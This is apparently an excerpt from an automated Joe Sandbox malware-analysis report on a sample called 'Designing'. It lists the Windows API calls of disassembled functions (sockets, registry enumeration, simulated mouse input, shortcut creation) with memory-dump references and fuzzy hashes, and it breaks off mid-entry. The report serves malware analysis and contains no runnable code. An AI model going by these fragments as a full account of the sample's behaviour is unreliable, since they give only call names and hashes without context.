                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3495660284-0
                                                                                                                                                                              • Opcode ID: 2b648a568c4cbc637ea15b941526e3cc02657eefc95f5f68c251756b2f2a1054
                                                                                                                                                                              • Instruction ID: 336dca8ae393e1f5efd2423e6342a6743ba30f429c063bc1cb2b099772c081f7
                                                                                                                                                                              • Opcode Fuzzy Hash: 2b648a568c4cbc637ea15b941526e3cc02657eefc95f5f68c251756b2f2a1054
                                                                                                                                                                              • Instruction Fuzzy Hash: 31F0C932046616AFD7411B55EE8DBDABF39FF04306F412121F201A18B4877495B9CF90
                                                                                                                                                                              APIs
                                                                                                                                                                              • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00E2281D
                                                                                                                                                                              • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00E2283E
                                                                                                                                                                              • WSAGetLastError.WSOCK32 ref: 00E2284F
                                                                                                                                                                              • htons.WSOCK32(?,?,?,?,?), ref: 00E22938
                                                                                                                                                                              • inet_ntoa.WSOCK32(?), ref: 00E228E9
                                                                                                                                                                                • Part of subcall function 00E0433E: _strlen.LIBCMT ref: 00E04348
                                                                                                                                                                                • Part of subcall function 00E23C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,00E1F669), ref: 00E23C9D
                                                                                                                                                                              • _strlen.LIBCMT ref: 00E22992
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3203458085-0
                                                                                                                                                                              • Opcode ID: c0dbdf3945c9cf1395d5e77f2d0df2b2a466d68cfd689ceea049eb8d106663c1
                                                                                                                                                                              • Instruction ID: 9f2acb5f993229cc1f8051e84f801fce0f8010950e4668a5ff855881398a78ae
                                                                                                                                                                              • Opcode Fuzzy Hash: c0dbdf3945c9cf1395d5e77f2d0df2b2a466d68cfd689ceea049eb8d106663c1
                                                                                                                                                                              • Instruction Fuzzy Hash: DAB11071604300AFC324DF24D885F2ABBE4EF85318F54954CF55A6B2A2DB31ED86CBA1
                                                                                                                                                                              APIs
                                                                                                                                                                              • __allrem.LIBCMT ref: 00DD042A
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DD0446
                                                                                                                                                                              • __allrem.LIBCMT ref: 00DD045D
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DD047B
                                                                                                                                                                              • __allrem.LIBCMT ref: 00DD0492
                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00DD04B0
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1992179935-0
                                                                                                                                                                              • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                              • Instruction ID: 8afe761b8849d3f13f59bfeda0a4b51e95504ebc5e32913120f77ed0a0cf6604
                                                                                                                                                                              • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                                                                                                                              • Instruction Fuzzy Hash: 5681E7726007069BE720AF69CC81B6A7BE9EF95324F28412FF551D7781E7B0D9008BB5
                                                                                                                                                                              APIs
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00DC8649,00DC8649,?,?,?,00DD67C2,00000001,00000001,8BE85006), ref: 00DD65CB
                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00DD67C2,00000001,00000001,8BE85006,?,?,?), ref: 00DD6651
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00DD674B
                                                                                                                                                                              • __freea.LIBCMT ref: 00DD6758
                                                                                                                                                                                • Part of subcall function 00DD3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DC6A79,?,0000015D,?,?,?,?,00DC85B0,000000FF,00000000,?,?), ref: 00DD3BC5
                                                                                                                                                                              • __freea.LIBCMT ref: 00DD6761
                                                                                                                                                                              • __freea.LIBCMT ref: 00DD6786
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1414292761-0
                                                                                                                                                                              • Opcode ID: 13aa7a7543ec34e64ee348808eff0dae4b2783c7987daf0f14b5e97ebd67e244
                                                                                                                                                                              • Instruction ID: e9aa472f47b4b3e2bc63ef60455dcebc4258ae2e60dc4b0ec9e5e34dc5958fb9
                                                                                                                                                                              • Opcode Fuzzy Hash: 13aa7a7543ec34e64ee348808eff0dae4b2783c7987daf0f14b5e97ebd67e244
                                                                                                                                                                              • Instruction Fuzzy Hash: 1451E472A0020ABFDB258F64CC85EBB77AAEB40754F19466AFD14D6240EB74DC54C6F0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DAB329: _wcslen.LIBCMT ref: 00DAB333
                                                                                                                                                                                • Part of subcall function 00E2D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00E2C10E,?,?), ref: 00E2D415
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D451
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4C8
                                                                                                                                                                                • Part of subcall function 00E2D3F8: _wcslen.LIBCMT ref: 00E2D4FE
                                                                                                                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00E2C72A
                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00E2C785
                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00E2C7CA
                                                                                                                                                                              • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00E2C7F9
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00E2C853
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00E2C85F
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1120388591-0
                                                                                                                                                                              • Opcode ID: d4b430bb428fef6b783236ee566fc4a3221faef9eaecbabe3e41d495d39be03d
                                                                                                                                                                              • Instruction ID: 37ee65fb159fcb6f748527b8b02f44c6f176d17015fbe182110380cd0cf9008d
                                                                                                                                                                              • Opcode Fuzzy Hash: d4b430bb428fef6b783236ee566fc4a3221faef9eaecbabe3e41d495d39be03d
                                                                                                                                                                              • Instruction Fuzzy Hash: 60819D70108241AFC718DF24D885E2ABBE5FF84308F24959DF4595B2A2DB31ED46CFA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • VariantInit.OLEAUT32(00000035), ref: 00E000A9
                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 00E00150
                                                                                                                                                                              • VariantCopy.OLEAUT32(00E00354,00000000), ref: 00E00179
                                                                                                                                                                              • VariantClear.OLEAUT32(00E00354), ref: 00E0019D
                                                                                                                                                                              • VariantCopy.OLEAUT32(00E00354,00000000), ref: 00E001A1
                                                                                                                                                                              • VariantClear.OLEAUT32(?), ref: 00E001AB
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Variant$ClearCopy$AllocInitString
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3859894641-0
                                                                                                                                                                              • Opcode ID: 186307a396b16db85bbe06d91de2669745d6124619eae23d2ea3becae290e960
                                                                                                                                                                              • Instruction ID: 534697a77437c8358b2a3fd8e873f9ebc96dbc5893112e493dd91fe3aef33df2
                                                                                                                                                                              • Opcode Fuzzy Hash: 186307a396b16db85bbe06d91de2669745d6124619eae23d2ea3becae290e960
                                                                                                                                                                              • Instruction Fuzzy Hash: 1051A835640310EACF20AB649889B69B7E5EF55310F14A447F906FF2E7DB709C84CB66
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA41EA: _wcslen.LIBCMT ref: 00DA41EF
                                                                                                                                                                                • Part of subcall function 00DA8577: _wcslen.LIBCMT ref: 00DA858A
                                                                                                                                                                              • GetOpenFileNameW.COMDLG32(00000058), ref: 00E19F2A
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E19F4B
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E19F72
                                                                                                                                                                              • GetSaveFileNameW.COMDLG32(00000058), ref: 00E19FCA
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _wcslen$FileName$OpenSave
                                                                                                                                                                              • String ID: X
                                                                                                                                                                              • API String ID: 83654149-3081909835
                                                                                                                                                                              • Opcode ID: 0ca1df3ba7cbde523c75aa0b9fbbf17066d10728aa55ac2f847d7e8551d4af5f
                                                                                                                                                                              • Instruction ID: 67fbb75788c3dbf1ce7601df1a1216fd0ec2fd4c4b4e11dae5510ba61443ec25
                                                                                                                                                                              • Opcode Fuzzy Hash: 0ca1df3ba7cbde523c75aa0b9fbbf17066d10728aa55ac2f847d7e8551d4af5f
                                                                                                                                                                              • Instruction Fuzzy Hash: EEE16F716043419FD724DF24C891AAAB7E1FF85314F04896DF889AB2A2DB31DD45CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E16F21
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00E1707E
                                                                                                                                                                              • CoCreateInstance.OLE32(00E40CC4,00000000,00000001,00E40B34,?), ref: 00E17095
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00E17319
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                              • String ID: .lnk
                                                                                                                                                                              • API String ID: 886957087-24824748
                                                                                                                                                                              • Opcode ID: ecc3828c6afe61679100705da129150c11c211821bcfa9bcd482f18a6284c43f
                                                                                                                                                                              • Instruction ID: c7509f89e3492ae02224e9ec1bba6d47c32e870cd520bf137dfd5cd60047009c
                                                                                                                                                                              • Opcode Fuzzy Hash: ecc3828c6afe61679100705da129150c11c211821bcfa9bcd482f18a6284c43f
                                                                                                                                                                              • Instruction Fuzzy Hash: 5CD13B71608301AFC304DF24C881EABB7E8FF99708F44496DF59697252DB71E945CBA2
                                                                                                                                                                              APIs
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F5), ref: 00E111B3
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00E111EE
                                                                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 00E1120A
                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 00E11283
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00E1129A
                                                                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 00E112C8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3368777196-0
                                                                                                                                                                              • Opcode ID: 0fc9f032137bfd977c2ea81df861dd959a3b0318cb00dbad6d23fc2459dbfa1d
                                                                                                                                                                              • Instruction ID: c4cb30db7eb4f7e360ef0c7caa5ce7a10a820a9066a07cd3e4cea70a6a88046c
                                                                                                                                                                              • Opcode Fuzzy Hash: 0fc9f032137bfd977c2ea81df861dd959a3b0318cb00dbad6d23fc2459dbfa1d
                                                                                                                                                                              • Instruction Fuzzy Hash: DE413D71900205EFDF059F55DC85AAABBB8FF44314F1440A9EE00AB2A6D770DE55DBA0
                                                                                                                                                                              APIs
                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00DFFBEF,00000000,?,?,00000000,?,00DE39E2,00000004,00000000,00000000), ref: 00E38CA7
                                                                                                                                                                              • EnableWindow.USER32(?,00000000), ref: 00E38CCD
                                                                                                                                                                              • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00E38D2C
                                                                                                                                                                              • ShowWindow.USER32(?,00000004), ref: 00E38D40
                                                                                                                                                                              • EnableWindow.USER32(?,00000001), ref: 00E38D66
                                                                                                                                                                              • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00E38D8A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 642888154-0
                                                                                                                                                                              • Opcode ID: e484beca0c9c0d6b30cf21a99b5f283a891a42059abd015f14f7e4eba69ed359
                                                                                                                                                                              • Instruction ID: 6292d4ddf18653934e55dabab2e43fa070a7622e3e052693a8ffd0e2deca6bac
                                                                                                                                                                              • Opcode Fuzzy Hash: e484beca0c9c0d6b30cf21a99b5f283a891a42059abd015f14f7e4eba69ed359
                                                                                                                                                                              • Instruction Fuzzy Hash: 5541B630601344AFDB25DF25DA9DBA17FF1FB85308F5860A9F6087B2A2CB316849CB51
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetForegroundWindow.USER32(?,?,00000000), ref: 00E22D45
                                                                                                                                                                                • Part of subcall function 00E1EF33: GetWindowRect.USER32(?,?), ref: 00E1EF4B
                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 00E22D6F
                                                                                                                                                                              • GetWindowRect.USER32(00000000), ref: 00E22D76
                                                                                                                                                                              • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00E22DB2
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 00E22DDE
                                                                                                                                                                              • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00E22E3C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2387181109-0
                                                                                                                                                                              • Opcode ID: 08efe451db2182ac16c01b04e4a79d230efa47296c4a4b420b8b9d7306fd6970
                                                                                                                                                                              • Instruction ID: d50b16dadf30679f4696ee1836b71bd63ef8a9d0861a0b3b5a60f03f85fca29d
                                                                                                                                                                              • Opcode Fuzzy Hash: 08efe451db2182ac16c01b04e4a79d230efa47296c4a4b420b8b9d7306fd6970
                                                                                                                                                                              • Instruction Fuzzy Hash: 4A31EF72509329AFC720DF14AC49B9ABBA9FBC4314F00091EF995A7191DB30E959CBD2
                                                                                                                                                                              APIs
                                                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00E055F9
                                                                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00E05616
                                                                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00E0564E
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E0566C
                                                                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00E05674
                                                                                                                                                                              • _wcsstr.LIBVCRUNTIME ref: 00E0567E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 72514467-0
                                                                                                                                                                              • Opcode ID: 8d091839ea9fd46b960313b2e3a2266b1f84f3bc69411bccf2d72363faadc3b3
                                                                                                                                                                              • Instruction ID: f2ea156919465c530e13a134d7d3e4eecb4d40f6d848aca57f5cef4c6428fda3
                                                                                                                                                                              • Opcode Fuzzy Hash: 8d091839ea9fd46b960313b2e3a2266b1f84f3bc69411bccf2d72363faadc3b3
                                                                                                                                                                              • Instruction Fuzzy Hash: 2E210432204604BBEB165B69AC49F7B7FA8DF44710F14402EF805EA0D1EA72CC818A70
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 00DA5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DA55D1,?,?,00DE4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00DA5871
                                                                                                                                                                              • _wcslen.LIBCMT ref: 00E162C0
                                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00E163DA
                                                                                                                                                                              • CoCreateInstance.OLE32(00E40CC4,00000000,00000001,00E40B34,?), ref: 00E163F3
                                                                                                                                                                              • CoUninitialize.OLE32 ref: 00E16411
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000000C.00000002.2788924738.0000000000DA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00DA0000, based on PE: true
                                                                                                                                                                              • Associated: 0000000C.00000002.2788896564.0000000000DA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E3D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789012425.0000000000E63000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789189706.0000000000E6D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              • Associated: 0000000C.00000002.2789216037.0000000000E75000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_12_2_da0000_Designing.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
